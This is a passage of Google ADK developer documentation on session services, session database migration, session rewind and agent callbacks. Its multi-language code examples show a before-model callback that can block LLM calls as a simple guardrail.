exampleSessionService.createSession( appName, userId, initialState, Optional.of(sessionId)).blockingGet(); System.out.println("Session created successfully."); System.out.println("--- Examining Session Properties ---"); System.out.printf("ID (`id`): %s%n", exampleSession.id()); System.out.printf("Application Name (`appName`): %s%n", exampleSession.appName()); System.out.printf("User ID (`userId`): %s%n", exampleSession.userId()); System.out.printf("State (`state`): %s%n", exampleSession.state()); System.out.println("------------------------------------"); // Clean up (optional for this example) var unused = exampleSessionService.deleteSession(appName, userId, sessionId); ``` \*(\**Note:* *The state shown above is only the initial state. State updates happen via events, as discussed in the State section.)* ## Managing Sessions with a `SessionService` As seen above, you don't typically create or manage `Session` objects directly. Instead, you use a **`SessionService`**. This service acts as the central manager responsible for the entire lifecycle of your conversation sessions. Its core responsibilities include: - **Starting New Conversations:** Creating fresh `Session` objects when a user begins an interaction. - **Resuming Existing Conversations:** Retrieving a specific `Session` (using its ID) so the agent can continue where it left off. - **Saving Progress:** Appending new interactions (`Event` objects) to a session's history. This is also the mechanism through which session `state` gets updated (more in the `State` section). - **Listing Conversations:** Finding the active session threads for a particular user and application. - **Cleaning Up:** Deleting `Session` objects and their associated data when conversations are finished or no longer needed. ## `SessionService` implementations ADK provides different `SessionService` implementations, allowing you to choose the storage backend that best suits your needs: ### `InMemorySessionService` - **How it works:** Stores all session data directly in the application's memory. - **Persistence:** None. **All conversation data is lost if the application restarts.** - **Requires:** Nothing extra. - **Best for:** Quick development, local testing, examples, and scenarios where long-term persistence isn't required. ```py from google.adk.sessions import InMemorySessionService session_service = InMemorySessionService() ``` ```typescript import { InMemorySessionService } from "@google/adk"; const sessionService = new InMemorySessionService(); ``` ```go import "google.golang.org/adk/session" inMemoryService := session.InMemoryService() ``` ```java import com.google.adk.sessions.InMemorySessionService; InMemorySessionService exampleSessionService = new InMemorySessionService(); ``` ### `VertexAiSessionService` Supported in ADKPython v0.1.0Go v0.1.0Java v0.1.0 - **How it works:** Uses Google Cloud Vertex AI infrastructure via API calls for session management. - **Persistence:** Yes. Data is managed reliably and scalably via [Vertex AI Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/). - **Requires:** - A Google Cloud project (`pip install vertexai`) - A Google Cloud storage bucket that can be configured by this [step](https://cloud.google.com/vertex-ai/docs/pipelines/configure-project#storage). - A Reasoning Engine resource name/ID that can setup following this [tutorial](https://google.github.io/adk-docs/deploy/agent-engine/). - If you do not have a Google Cloud project and you want to try the VertexAiSessionService, see [Vertex AI Express Mode](/adk-docs/tools/google-cloud/express-mode/). - **Best for:** Scalable production applications deployed on Google Cloud, especially when integrating with other Vertex AI features. ```py # Requires: pip install google-adk[vertexai] # Plus GCP setup and authentication from google.adk.sessions import VertexAiSessionService PROJECT_ID = "your-gcp-project-id" LOCATION = "us-central1" # The app_name used with this service should be the Reasoning Engine ID or name REASONING_ENGINE_APP_NAME = "projects/your-gcp-project-id/locations/us-central1/reasoningEngines/your-engine-id" session_service = VertexAiSessionService(project=PROJECT_ID, location=LOCATION) # Use REASONING_ENGINE_APP_NAME when calling service methods, e.g.: # session_service = await session_service.create_session(app_name=REASONING_ENGINE_APP_NAME, ...) ``` ```go import "google.golang.org/adk/session" // 2. VertexAIService // Before running, ensure your environment is authenticated: // gcloud auth application-default login // export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" // export GOOGLE_CLOUD_LOCATION="your-gcp-location" modelName := "gemini-flash-latest" // Replace with your desired model vertexService, err := session.VertexAIService(ctx, modelName) if err != nil { log.Printf("Could not initialize VertexAIService (this is expected if the gcloud project is not set): %v", err) } else { fmt.Println("Successfully initialized VertexAIService.") } ``` ```java // Please look at the set of requirements above, consequently export the following in your bashrc file: // export GOOGLE_CLOUD_PROJECT=my_gcp_project // export GOOGLE_CLOUD_LOCATION=us-central1 // export GOOGLE_API_KEY=my_api_key import com.google.adk.sessions.VertexAiSessionService; import java.util.UUID; String sessionId = UUID.randomUUID().toString(); String reasoningEngineAppName = "123456789"; String userId = "u_123"; // Example user id ConcurrentMap initialState = new ConcurrentHashMap<>(); // No initial state needed for this example VertexAiSessionService sessionService = new VertexAiSessionService(); Session mySession = sessionService .createSession(reasoningEngineAppName, userId, initialState, Optional.of(sessionId)) .blockingGet(); ``` ### `DatabaseSessionService` Supported in ADKPython v0.1.0Go v0.1.0 - **How it works:** Connects to a relational database (e.g., PostgreSQL, MySQL, SQLite) to store session data persistently in tables. - **Persistence:** Yes. Data survives application restarts. - **Requires:** A configured database. - **Best for:** Applications needing reliable, persistent storage that you manage yourself. ```py from google.adk.sessions import DatabaseSessionService # Example using a local SQLite file: # Note: The implementation requires an async database driver. # For SQLite, use 'sqlite+aiosqlite' instead of 'sqlite' to ensure async compatibility. db_url = "sqlite+aiosqlite:///./my_agent_data.db" session_service = DatabaseSessionService(db_url=db_url) ``` Async Driver Requirement `DatabaseSessionService` requires an async database driver. When using SQLite, you must use `sqlite+aiosqlite` instead of `sqlite` in your connection string. For other databases (PostgreSQL, MySQL), ensure you're using an async-compatible driver, such as `asyncpg` for PostgreSQL, `aiomysql` for MySQL. Session database schema change in ADK Python v1.22.0 The schema for the session database changed in ADK Python v1.22.0, which requires migration of the Session Database. For more information, see [Session database schema migration](/adk-docs/sessions/session/migrate/). ## The Session Lifecycle Here’s a simplified flow of how `Session` and `SessionService` work together during a conversation turn: 1. **Start or Resume:** Your application needs to use the `SessionService` to either `create_session` (for a new chat) or use an existing session id. 1. **Context Provided:** The `Runner` gets the appropriate `Session` object from the appropriate service method, providing the agent with access to the corresponding Session's `state` and `events`. 1. **Agent Processing:** The user prompts the agent with a query. The agent analyzes the query and potentially the session `state` and `events` history to determine the response. 1. **Response & State Update:** The agent generates a response (and potentially flags data to be updated in the `state`). The `Runner` packages this as an `Event`. 1. **Save Interaction:** The `Runner` calls `sessionService.append_event(session, event)` with the `session` and the new `event` as the arguments. The service adds the `Event` to the history and updates the session's `state` in storage based on information within the event. The session's `last_update_time` also get updated. 1. **Ready for Next:** The agent's response goes to the user. The updated `Session` is now stored by the `SessionService`, ready for the next turn (which restarts the cycle at step 1, usually with the continuation of the conversation in the current session). 1. **End Conversation:** When the conversation is over, your application calls `sessionService.delete_session(...)` to clean up the stored session data if it is no longer required. This cycle highlights how the `SessionService` ensures conversational continuity by managing the history and state associated with each `Session` object. # Session database schema migration Supported in ADKPython v1.22.1 If you are using `DatabaseSessionService` and upgrading to ADK Python release v1.22.0 or higher, you should migrate your database to the new session database schema. Starting with ADK Python release v1.22.0, the database schema for `DatabaseSessionService` has been updated from `v0`, which is a pickle-based serialization, to `v1`, which uses JSON-based serialization. Previous `v0` session schema databases will continue to work with ADK Python v1.22.0 and higher versions, but the `v1` schema may be required in future releases. ## Migrate session database A migration script is provided to facilitate the migration process. The script reads data from your existing database, converts it to the new format, and writes it to a new database. You can run the migration using the ADK Command Line Interface (CLI) `migrate session` command, as shown in the following examples: Required: ADK Python v1.22.1 or higher ADK Python v1.22.1 is required for this procedure because it includes the migration command line interface function and bug fixes to support the session database schema change. ```bash adk migrate session \ --source_db_url=sqlite:///source.db \ --dest_db_url=sqlite:///dest.db ``` ```bash adk migrate session \ --source_db_url=postgresql://localhost:5432/v0 \ --dest_db_url=postgresql://localhost:5432/v1 ``` After running the migration, update your `DatabaseSessionService` configuration to use the new database URL you specified for `dest_db_url`. # Rewind sessions for agents Supported in ADKPython v1.17.0 The ADK session Rewind feature allows you to revert a session to a previous request state, enabling you to undo mistakes, explore alternative paths, or restart a process from a known good point. This document provides an overview of the feature, how to use it, and its limitations. ## Rewind a session When you rewind a session, you specify a user request, or ***invocation***, that you want to undo, and the system undoes that request and the requests after it. So if you have three requests (A, B, C) and you want to return to the state at request A, you specify B, which undoes the changes from requests B and C. You rewind a session by using the rewind method on a ***Runner*** instance, specifying the user, session, and invocation id, as shown in the following code snippet: ```python # Create runner runner = InMemoryRunner( agent=agent.root_agent, app_name=APP_NAME, ) # Create a session session = await runner.session_service.create_session( app_name=APP_NAME, user_id=USER_ID ) # call agent with wrapper function "call_agent_async()" await call_agent_async( runner, USER_ID, session.id, "set state color to red" ) # ... more agent calls ... events_list = await call_agent_async( runner, USER_ID, session.id, "update state color to blue" ) # get invocation id rewind_invocation_id=events_list[1].invocation_id # rewind invocations (state color: red) await runner.rewind_async( user_id=USER_ID, session_id=session.id, rewind_before_invocation_id=rewind_invocation_id, ) ``` When you call the ***rewind*** method, all ADK managed session-level resources are restored to the state they were in *before* the request you specified with the ***invocation id***. However, global resources, such as app-level or user-level state and artifacts, are not restored. For a complete example of an agent session rewind, see the [rewind_session](https://github.com/google/adk-python/tree/main/contributing/samples/rewind_session) sample code. For more information on the limitations of the Rewind feature, see [Limitations](#limitations). ## How it works The Rewind feature creates a special ***rewind*** request that restores the session's state and artifacts to their condition *before* the rewind point specified by an invocation id. This approach means that all requests, including rewound requests, are preserved in the log for later debugging, analysis, or auditing. After the rewind, the system ignores the rewound requests when it prepares the next requests for the AI model. This behavior means the AI model used by the agent effectively forgets any interactions from the rewind point up to the next request. ## Limitations The Rewind feature has some limitations that you should be aware of when using it with your agent workflow: - **Global agent resources:** App-level and user-level state and artifacts are *not* restored by the rewind feature. Only session-level state and artifacts are restored. - **External dependencies:** The rewind feature does not manage external dependencies. If a tool in your agent interacts with external systems, it is your responsibility to handle the restoration of those systems to their prior state. - **Atomicity:** State updates, artifact updates, and event persistence are not performed in a single atomic transaction. Therefore, you should avoid rewinding active sessions or concurrently manipulating session artifacts during a rewind to prevent inconsistencies. # Callbacks: Observe, Customize, and Control Agent Behavior Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Callbacks are a cornerstone feature of ADK, providing a powerful mechanism to hook into an agent's execution process. They allow you to observe, customize, and even control the agent's behavior at specific, predefined points without modifying the core ADK framework code. **What are they?** In essence, callbacks are standard functions that you define. You then associate these functions with an agent when you create it. The ADK framework automatically calls your functions at key stages, letting you observe or intervene. Think of it like checkpoints during the agent's process: - **Before the agent starts its main work on a request, and after it finishes:** When you ask an agent to do something (e.g., answer a question), it runs its internal logic to figure out the response. - The `Before Agent` callback executes *right before* this main work begins for that specific request. - The `After Agent` callback executes *right after* the agent has finished all its steps for that request and has prepared the final result, but just before the result is returned. - This "main work" encompasses the agent's *entire* process for handling that single request. This might involve deciding to call an LLM, actually calling the LLM, deciding to use a tool, using the tool, processing the results, and finally putting together the answer. These callbacks essentially wrap the whole sequence from receiving the input to producing the final output for that one interaction. - **Before sending a request to, or after receiving a response from, the Large Language Model (LLM):** These callbacks (`Before Model`, `After Model`) allow you to inspect or modify the data going to and coming from the LLM specifically. - **Before executing a tool (like a Python function or another agent) or after it finishes:** Similarly, `Before Tool` and `After Tool` callbacks give you control points specifically around the execution of tools invoked by the agent. **Why use them?** Callbacks unlock significant flexibility and enable advanced agent capabilities: - **Observe & Debug:** Log detailed information at critical steps for monitoring and troubleshooting. - **Customize & Control:** Modify data flowing through the agent (like LLM requests or tool results) or even bypass certain steps entirely based on your logic. - **Implement Guardrails:** Enforce safety rules, validate inputs/outputs, or prevent disallowed operations. - **Manage State:** Read or dynamically update the agent's session state during execution. - **Integrate & Enhance:** Trigger external actions (API calls, notifications) or add features like caching. Tip When implementing security guardrails and policies, use ADK Plugins for better modularity and flexibility than Callbacks. For more details, see [Callbacks and Plugins for Security Guardrails](/adk-docs/safety/#callbacks-and-plugins-for-security-guardrails). **How are they added:** Code ```python from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmResponse, LlmRequest from typing import Optional # --- Define your callback function --- def my_before_model_logic( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: print(f"Callback running before model call for agent: {callback_context.agent_name}") # ... your custom logic here ... return None # Allow the model call to proceed # --- Register it during Agent creation --- my_agent = LlmAgent( name="MyCallbackAgent", model="gemini-2.0-flash", # Or your desired model instruction="Be helpful.", # Other agent parameters... before_model_callback=my_before_model_logic # Pass the function here ) ``` ```typescript import { LlmAgent, InMemoryRunner, CallbackContext, LlmRequest, LlmResponse, Event, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; import type { Content } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "basic_callback_app"; const USER_ID = "test_user_basic"; const SESSION_ID = "session_basic_001"; // --- Define your callback function --- function myBeforeModelLogic({ context, request, }: { context: CallbackContext; request: LlmRequest; }): LlmResponse | undefined { console.log( `Callback running before model call for agent: ${context.agentName}` ); // ... your custom logic here ... return undefined; // Allow the model call to proceed } // --- Register it during Agent creation --- const myAgent = new LlmAgent({ name: "MyCallbackAgent", model: MODEL_NAME, instruction: "Be helpful.", beforeModelCallback: myBeforeModelLogic, }); ``` ```go package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/genai" ) // onBeforeModel is a callback function that gets triggered before an LLM call. func onBeforeModel(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("--- onBeforeModel Callback Triggered ---") log.Printf("Model Request to be sent: %v\n", req) // Returning nil allows the default LLM call to proceed. return nil, nil } func runBasicExample() { const ( appName = "CallbackBasicApp" userID = "test_user_123" ) ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // Register the callback function in the agent configuration. agentCfg := llmagent.Config{ Name: "SimpleAgent", Model: geminiModel, BeforeModelCallbacks: []llmagent.BeforeModelCallback{onBeforeModel}, } simpleAgent, err := llmagent.New(agentCfg) if err != nil { log.Fatalf("Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{ AppName: appName, Agent: simpleAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } ``` ```java import com.google.adk.agents.CallbackContext; import com.google.adk.agents.Callbacks; import com.google.adk.agents.LlmAgent; import com.google.adk.models.LlmRequest; import java.util.Optional; public class AgentWithBeforeModelCallback { public static void main(String[] args) { // --- Define your callback logic --- Callbacks.BeforeModelCallbackSync myBeforeModelLogic = (CallbackContext callbackContext, LlmRequest llmRequest) -> { System.out.println( "Callback running before model call for agent: " + callbackContext.agentName()); // ... your custom logic here ... // Return Optional.empty() to allow the model call to proceed, // similar to returning None in the Python example. // If you wanted to return a response and skip the model call, // you would return Optional.of(yourLlmResponse). return Optional.empty(); }; // --- Register it during Agent creation --- LlmAgent myAgent = LlmAgent.builder() .name("MyCallbackAgent") .model("gemini-2.0-flash") // Or your desired model .instruction("Be helpful.") // Other agent parameters... .beforeModelCallbackSync(myBeforeModelLogic) // Pass the callback implementation here .build(); } } ``` ## The Callback Mechanism: Interception and Control When the ADK framework encounters a point where a callback can run (e.g., just before calling the LLM), it checks if you provided a corresponding callback function for that agent. If you did, the framework executes your function. **Context is Key:** Your callback function isn't called in isolation. The framework provides special **context objects** (`CallbackContext` or `ToolContext`) as arguments. These objects contain vital information about the current state of the agent's execution, including the invocation details, session state, and potentially references to services like artifacts or memory. You use these context objects to understand the situation and interact with the framework. (See the dedicated "Context Objects" section for full details). **Controlling the Flow (The Core Mechanism):** The most powerful aspect of callbacks lies in how their **return value** influences the agent's subsequent actions. This is how you intercept and control the execution flow: 1. **`return None` (Allow Default Behavior):** - The specific return type can vary depending on the language. In Java, the equivalent return type is `Optional.empty()`. Refer to the API documentation for language specific guidance. - This is the standard way to signal that your callback has finished its work (e.g., logging, inspection, minor modifications to *mutable* input arguments like `llm_request`) and that the ADK agent should **proceed with its normal operation**. - For `before_*` callbacks (`before_agent`, `before_model`, `before_tool`), returning `None` means the next step in the sequence (running the agent logic, calling the LLM, executing the tool) will occur. - For `after_*` callbacks (`after_agent`, `after_model`, `after_tool`), returning `None` means the result just produced by the preceding step (the agent's output, the LLM's response, the tool's result) will be used as is. 1. **`return ` (Override Default Behavior):** - Returning a *specific type of object* (instead of `None`) is how you **override** the ADK agent's default behavior. The framework will use the object you return and *skip* the step that would normally follow or *replace* the result that was just generated. - **`before_agent_callback` → `types.Content`**: Skips the agent's main execution logic (`_run_async_impl` / `_run_live_impl`). The returned `Content` object is immediately treated as the agent's final output for this turn. Useful for handling simple requests directly or enforcing access control. - **`before_model_callback` → `LlmResponse`**: Skips the call to the external Large Language Model. The returned `LlmResponse` object is processed as if it were the actual response from the LLM. Ideal for implementing input guardrails, prompt validation, or serving cached responses. - **`before_tool_callback` → `dict` or `Map`**: Skips the execution of the actual tool function (or sub-agent). The returned `dict` is used as the result of the tool call, which is then typically passed back to the LLM. Perfect for validating tool arguments, applying policy restrictions, or returning mocked/cached tool results. - **`after_agent_callback` → `types.Content`**: *Replaces* the `Content` that the agent's run logic just produced. - **`after_model_callback` → `LlmResponse`**: *Replaces* the `LlmResponse` received from the LLM. Useful for sanitizing outputs, adding standard disclaimers, or modifying the LLM's response structure. - **`after_tool_callback` → `dict` or `Map`**: *Replaces* the `dict` result returned by the tool. Allows for post-processing or standardization of tool outputs before they are sent back to the LLM. **Conceptual Code Example (Guardrail):** This example demonstrates the common pattern for a guardrail using `before_model_callback`. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.models import LlmResponse, LlmRequest from google.adk.runners import Runner from typing import Optional from google.genai import types from google.adk.sessions import InMemorySessionService GEMINI_2_FLASH="gemini-2.0-flash" # --- Define the Callback Function --- def simple_before_model_modifier( callback_context: CallbackContext, llm_request: LlmRequest ) -> Optional[LlmResponse]: """Inspects/modifies the LLM request or skips the call.""" agent_name = callback_context.agent_name print(f"[Callback] Before model call for agent: {agent_name}") # Inspect the last user message in the request contents last_user_message = "" if llm_request.contents and llm_request.contents[-1].role == 'user': if llm_request.contents[-1].parts: last_user_message = llm_request.contents[-1].parts[0].text print(f"[Callback] Inspecting last user message: '{last_user_message}'") # --- Modification Example --- # Add a prefix to the system instruction original_instruction = llm_request.config.system_instruction or types.Content(role="system", parts=[]) prefix = "[Modified by Callback] " # Ensure system_instruction is Content and parts list exists if not isinstance(original_instruction, types.Content): # Handle case where it might be a string (though config expects Content) original_instruction = types.Content(role="system", parts=[types.Part(text=str(original_instruction))]) if not original_instruction.parts: original_instruction.parts.append(types.Part(text="")) # Add an empty part if none exist # Modify the text of the first part modified_text = prefix + (original_instruction.parts[0].text or "") original_instruction.parts[0].text = modified_text llm_request.config.system_instruction = original_instruction print(f"[Callback] Modified system instruction to: '{modified_text}'") # --- Skip Example --- # Check if the last user message contains "BLOCK" if "BLOCK" in last_user_message.upper(): print("[Callback] 'BLOCK' keyword found. Skipping LLM call.") # Return an LlmResponse to skip the actual LLM call return LlmResponse( content=types.Content( role="model", parts=[types.Part(text="LLM call was blocked by before_model_callback.")], ) ) else: print("[Callback] Proceeding with LLM call.") # Return None to allow the (modified) request to go to the LLM return None # Create LlmAgent and Assign Callback my_llm_agent = LlmAgent( name="ModelCallbackAgent", model=GEMINI_2_FLASH, instruction="You are a helpful assistant.", # Base instruction description="An LLM agent demonstrating before_model_callback", before_model_callback=simple_before_model_modifier # Assign the function here ) APP_NAME = "guardrail_app" USER_ID = "user_1" SESSION_ID = "session_001" # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=my_llm_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("write a joke on BLOCK") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_model_callback_app"; const USER_ID = "test_user_before_model"; const SESSION_ID_BLOCK = "session_block_model_call"; const SESSION_ID_NORMAL = "session_normal_model_call"; // --- Define the Callback Function --- function simpleBeforeModelModifier({ context, request, }: { context: CallbackContext; request: any; }): any | undefined { console.log(`[Callback] Before model call for agent: ${context.agentName}`); // Inspect the last user message in the request contents const lastUserMessage = request.contents?.at(-1)?.parts?.[0]?.text ?? ""; console.log(`[Callback] Inspecting last user message: '${lastUserMessage}'`); // --- Modification Example --- // Add a prefix to the system instruction. // We create a deep copy to avoid modifying the original agent's config object. const modifiedConfig = JSON.parse(JSON.stringify(request.config)); const originalInstructionText = modifiedConfig.systemInstruction?.parts?.[0]?.text ?? ""; const prefix = "[Modified by Callback] "; modifiedConfig.systemInstruction = { role: "system", parts: [{ text: prefix + originalInstructionText }], }; request.config = modifiedConfig; // Assign the modified config back to the request console.log( `[Callback] Modified system instruction to: '${modifiedConfig.systemInstruction.parts[0].text}'` ); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessage.toUpperCase().includes("BLOCK")) { console.log("[Callback] 'BLOCK' keyword found. Skipping LLM call."); // Return an LlmResponse to skip the actual LLM call return { content: { role: "model", parts: [ { text: "LLM call was blocked by the before_model_callback." }, ], }, }; } console.log("[Callback] Proceeding with LLM call."); // Return undefined to allow the (modified) request to go to the LLM return undefined; } // --- Create LlmAgent and Assign Callback --- const myLlmAgent = new LlmAgent({ name: "ModelCallbackAgent", model: MODEL_NAME, instruction: "You are a helpful assistant.", // Base instruction description: "An LLM agent demonstrating before_model_callback", beforeModelCallback: simpleBeforeModelModifier, // Assign the function here }); // --- Agent Interaction Logic --- async function callAgentAndPrint( runner: InMemoryRunner, query: string, sessionId: string ) { console.log(`\n>>> Calling Agent with query: "${query}"`); let finalResponseContent = "No final response received."; const events = runner.runAsync({ userId: USER_ID, sessionId, newMessage: createUserContent(query) }); for await (const event of events) { if (isFinalResponse(event) && event.content?.parts?.length) { finalResponseContent = event.content.parts .map((part: { text?: string }) => part.text ?? "") .join(""); } } console.log("<<< Agent Response: ", finalResponseContent); } // --- Run Interactions --- async function main() { const runner = new InMemoryRunner({ agent: myLlmAgent, appName: APP_NAME }); // Scenario 1: The callback will find "BLOCK" and skip the model call await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_BLOCK, }); await callAgentAndPrint( runner, "write a joke about BLOCK", SESSION_ID_BLOCK ); // Scenario 2: The callback will modify the instruction and proceed await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_NORMAL, }); await callAgentAndPrint(runner, "write a short poem", SESSION_ID_NORMAL); } main(); ``` ```go package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/genai" ) // onBeforeModelGuardrail is a callback that inspects the LLM request. // If it contains a forbidden topic, it blocks the request and returns a // predefined response. Otherwise, it allows the request to proceed. func onBeforeModelGuardrail(ctx agent.CallbackContext, req *model.LLMRequest) (*model.LLMResponse, error) { log.Println("--- onBeforeModelGuardrail Callback Triggered ---") // Inspect the request content for forbidden topics. for _, content := range req.Contents { for _, part := range content.Parts { if strings.Contains(part.Text, "finance") { log.Println("Forbidden topic 'finance' detected. Blocking LLM call.") // By returning a non-nil response, we override the default behavior // and prevent the actual LLM call. return &model.LLMResponse{ Content: &genai.Content{ Parts: []*genai.Part{{Text: "I'm sorry, but I cannot discuss financial topics."}}, Role: "model", }, }, nil } } } log.Println("No forbidden topics found. Allowing LLM call to proceed.") // Returning nil allows the default LLM call to proceed. return nil, nil } func runGuardrailExample() { const ( appName = "GuardrailApp" userID = "test_user_456" ) ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } agentCfg := llmagent.Config{ Name: "ChatAgent", Model: geminiModel, BeforeModelCallbacks: []llmagent.BeforeModelCallback{onBeforeModelGuardrail}, } chatAgent, err := llmagent.New(agentCfg) if err != nil { log.Fatalf("Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{ AppName: appName, Agent: chatAgent, SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } ``` ```java import com.google.adk.agents.CallbackContext; import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.models.LlmRequest; import com.google.adk.models.LlmResponse; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.GenerateContentConfig; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import java.util.ArrayList; import java.util.List; import java.util.Optional; import java.util.stream.Collectors; public class BeforeModelGuardrailExample { private static final String MODEL_ID = "gemini-2.0-flash"; private static final String APP_NAME = "guardrail_app"; private static final String USER_ID = "user_1"; public static void main(String[] args) { BeforeModelGuardrailExample example = new BeforeModelGuardrailExample(); example.defineAgentAndRun("Tell me about quantum computing. This is a test."); } // --- Define your callback logic --- // Looks for the word "BLOCK" in the user prompt and blocks the call to LLM if found. // Otherwise the LLM call proceeds as usual. public Optional simpleBeforeModelModifier( CallbackContext callbackContext, LlmRequest llmRequest) { System.out.println("[Callback] Before model call for agent: " + callbackContext.agentName()); // Inspect the last user message in the request contents String lastUserMessageText = ""; List requestContents = llmRequest.contents(); if (requestContents != null && !requestContents.isEmpty()) { Content lastContent = requestContents.get(requestContents.size() - 1); if (lastContent.role().isPresent() && "user".equals(lastContent.role().get())) { lastUserMessageText = lastContent.parts().orElse(List.of()).stream() .flatMap(part -> part.text().stream()) .collect(Collectors.joining(" ")); // Concatenate text from all parts } } System.out.println("[Callback] Inspecting last user message: '" + lastUserMessageText + "'"); String prefix = "[Modified by Callback] "; GenerateContentConfig currentConfig = llmRequest.config().orElse(GenerateContentConfig.builder().build()); Optional optOriginalSystemInstruction = currentConfig.systemInstruction(); Content conceptualModifiedSystemInstruction; if (optOriginalSystemInstruction.isPresent()) { Content originalSystemInstruction = optOriginalSystemInstruction.get(); List originalParts = new ArrayList<>(originalSystemInstruction.parts().orElse(List.of())); String originalText = ""; if (!originalParts.isEmpty()) { Part firstPart = originalParts.get(0); if (firstPart.text().isPresent()) { originalText = firstPart.text().get(); } originalParts.set(0, Part.fromText(prefix + originalText)); } else { originalParts.add(Part.fromText(prefix)); } conceptualModifiedSystemInstruction = originalSystemInstruction.toBuilder().parts(originalParts).build(); } else { conceptualModifiedSystemInstruction = Content.builder() .role("system") .parts(List.of(Part.fromText(prefix))) .build(); } // This demonstrates building a new LlmRequest with the modified config. llmRequest = llmRequest.toBuilder() .config( currentConfig.toBuilder() .systemInstruction(conceptualModifiedSystemInstruction) .build()) .build(); System.out.println( "[Callback] Conceptually modified system instruction is: '" + llmRequest.config().get().systemInstruction().get().parts().get().get(0).text().get()); // --- Skip Example --- // Check if the last user message contains "BLOCK" if (lastUserMessageText.toUpperCase().contains("BLOCK")) { System.out.println("[Callback] 'BLOCK' keyword found. Skipping LLM call."); LlmResponse skipResponse = LlmResponse.builder() .content( Content.builder() .role("model") .parts( List.of( Part.builder() .text("LLM call was blocked by before_model_callback.") .build())) .build()) .build(); return Optional.of(skipResponse); } System.out.println("[Callback] Proceeding with LLM call."); // Return Optional.empty() to allow the (modified) request to go to the LLM return Optional.empty(); } public void defineAgentAndRun(String prompt) { // --- Create LlmAgent and Assign Callback --- LlmAgent myLlmAgent = LlmAgent.builder() .name("ModelCallbackAgent") .model(MODEL_ID) .instruction("You are a helpful assistant.") // Base instruction .description("An LLM agent demonstrating before_model_callback") .beforeModelCallbackSync(this::simpleBeforeModelModifier) // Assign the callback here .build(); // Session and Runner InMemoryRunner runner = new InMemoryRunner(myLlmAgent, APP_NAME); // InMemoryRunner automatically creates a session service. Create a session using the service Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Stream event response eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` By understanding this mechanism of returning `None` versus returning specific objects, you can precisely control the agent's execution path, making callbacks an essential tool for building sophisticated and reliable agents with ADK. # Design Patterns and Best Practices for Callbacks Callbacks offer powerful hooks into the agent lifecycle. Here are common design patterns illustrating how to leverage them effectively in ADK, followed by best practices for implementation. ## Design Patterns These patterns demonstrate typical ways to enhance or control agent behavior using callbacks: ### 1. Guardrails & Policy Enforcement **Pattern Overview:** Intercept requests before they reach the LLM or tools to enforce rules. **Implementation:** - Use `before_model_callback` to inspect the `LlmRequest` prompt - Use `before_tool_callback` to inspect 